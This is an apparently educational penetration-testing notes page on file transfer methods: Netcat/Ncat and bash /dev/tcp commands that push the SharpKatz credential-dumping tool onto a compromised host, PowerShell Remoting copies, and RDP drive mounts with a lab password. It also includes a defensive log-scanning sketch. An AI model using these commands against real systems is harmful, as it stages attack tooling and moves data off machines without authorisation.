# Miscellaneous File Transfer Methods

## File Transfer with Netcat and Ncat

{% hint style="info" %}
Ncat is the Nmap project's updated and maintained version of the original Netcat, which is no longer maintained.
{% endhint %}

### Target Machine

```bash
nc -l -p 8000 > SharpKatz.exe
```

If the compromised machine is using Ncat, we'll need to specify `--recv-only` to close the connection once the file transfer is finished.

```bash
ncat -l -p 8000 --recv-only > SharpKatz.exe
```

### Attack Machine

```bash
nc -q 0 192.168.49.128 8000 < SharpKatz.exe
```

By utilizing Ncat on our attacking host, we can opt for `--send-only` rather than `-q`. The `--send-only` flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. Typically, Ncat would continue running until the network connection is closed, as the remote side may transmit additional data. However, with `--send-only`, there is no need to anticipate further incoming information.

```bash
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
```

### **Attack Host - Sending File as Input to Netcat**

```bash
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

```bash
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

### **Target - Connect to Netcat to Receive the File**

```bash
nc 192.168.49.128 443 > SharpKatz.exe
```

```bash
ncat 192.168.49.128 443 --recv-only > SharpKatz.exe
```

### **Target - Connecting to Netcat Using /dev/tcp to Receive the File**

```bash
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
```
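Seen from the defender's side, the Netcat, Ncat and `/dev/tcp` command lines in this section leave recognizable traces in shell-command logs. The sketch below is an added example, not part of the original page: it classifies command lines by the listener flag, `--recv-only`/`--send-only`, `/dev/tcp` redirection, and file redirection. The log lines are constructed, and the names `classify`, `scan` and `SAMPLE_LOG` are hypothetical.

```python
import re
import shlex

# Constructed shell-command log lines (user, command); not taken from a real system.
SAMPLE_LOG = [
    ("www-data", "nc -l -p 8000 > upload.bin"),
    ("www-data", "ncat 192.168.49.128 443 --recv-only > upload.bin"),
    ("root", "sudo ncat -lp 443 --send-only < report.zip"),
    ("www-data", "cat < /dev/tcp/192.168.49.128/443 > upload.bin"),
    ("backup", "tar czf /srv/backup.tgz /home"),
]

NC_NAMES = {"nc", "ncat", "netcat"}
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")

def classify(cmdline):
    """Return the reasons a command line resembles a raw-socket file transfer."""
    reasons = []
    if DEV_TCP.search(cmdline):
        reasons.append("bash /dev/tcp redirection")
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        tokens = cmdline.split()
    # Locate the netcat binary by basename so /usr/bin/ncat and "sudo nc" both match.
    pos = next((i for i, t in enumerate(tokens)
                if t.rsplit("/", 1)[-1] in NC_NAMES), None)
    if pos is None:
        return reasons
    args = tokens[pos + 1:]
    # Merge clustered short options (-lp, -lvnp) so "l" is found either way.
    short = "".join(a[1:] for a in args if re.fullmatch(r"-[A-Za-z]+", a))
    if "l" in short or "--listen" in args:
        reasons.append("netcat listener")
    for flag in ("--recv-only", "--send-only"):
        if flag in args:
            reasons.append("ncat " + flag)
    # Redirection only appears in shell-level logs, not in execve audit records.
    if "<" in args or ">" in args:
        reasons.append("file redirection")
    return reasons

def scan(log):
    """Return (user, command, reasons) for every line with at least one reason."""
    return [(u, c, r) for u, c in log if (r := classify(c))]

if __name__ == "__main__":
    for user, cmd, why in scan(SAMPLE_LOG):
        print(f"{user}: {cmd} -> {', '.join(why)}")
```

Administrators also use Netcat legitimately, so matches are better treated as leads to correlate with the user, host and destination than as verdicts.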

## PowerShell Session File Transfer

We have already covered file transfers with PowerShell, but there may be scenarios where HTTP, HTTPS, or SMB are unavailable. If that's the case, we can use [PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.2), aka WinRM, to perform file transfer operations.

[PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.2) allows us to execute scripts or commands on a remote computer using PowerShell sessions. Administrators commonly use PowerShell Remoting to manage remote computers in a network, and we can also use it for file transfer operations. By default, enabling PowerShell remoting creates both an HTTP and an HTTPS listener. The listeners run on default ports TCP/5985 for HTTP and TCP/5986 for HTTPS.

To create a PowerShell Remoting session on a remote computer, we need administrative access, membership in the `Remote Management Users` group, or explicit permissions for PowerShell Remoting in the session configuration.

### **From DC01 - Confirm WinRM Port TCP 5985 is Open on DATABASE01**

```powershell
Test-NetConnection -ComputerName DATABASE01 -Port 5985
```

### **Create a PowerShell Remoting Session to DATABASE01**

```powershell
$Session = New-PSSession -ComputerName DATABASE01
```

### **Copy samplefile.txt from our Localhost to the DATABASE01 Session**

```powershell
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
```

### **Copy DATABASE.txt from DATABASE01 Session to our Localhost**

```powershell
Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
```

## RDP

### **Mounting a Linux Folder Using rdesktop**

```shell-session
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

### **Mounting a Linux Folder Using xfreerdp**

```shell-session
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

### Windows

On Windows, the native [mstsc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc) remote desktop client can be used.

<figure><img src="https://251353229-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIo1z7P4Rl2BT9EibHkhc%2Fuploads%2FqoTjzwaSgNmu4lmWmzPz%2Frdp.webp?alt=media&#x26;token=0ff3a9bf-4cb8-4a16-9c23-748cfc42779b" alt=""><figcaption></figcaption></figure>
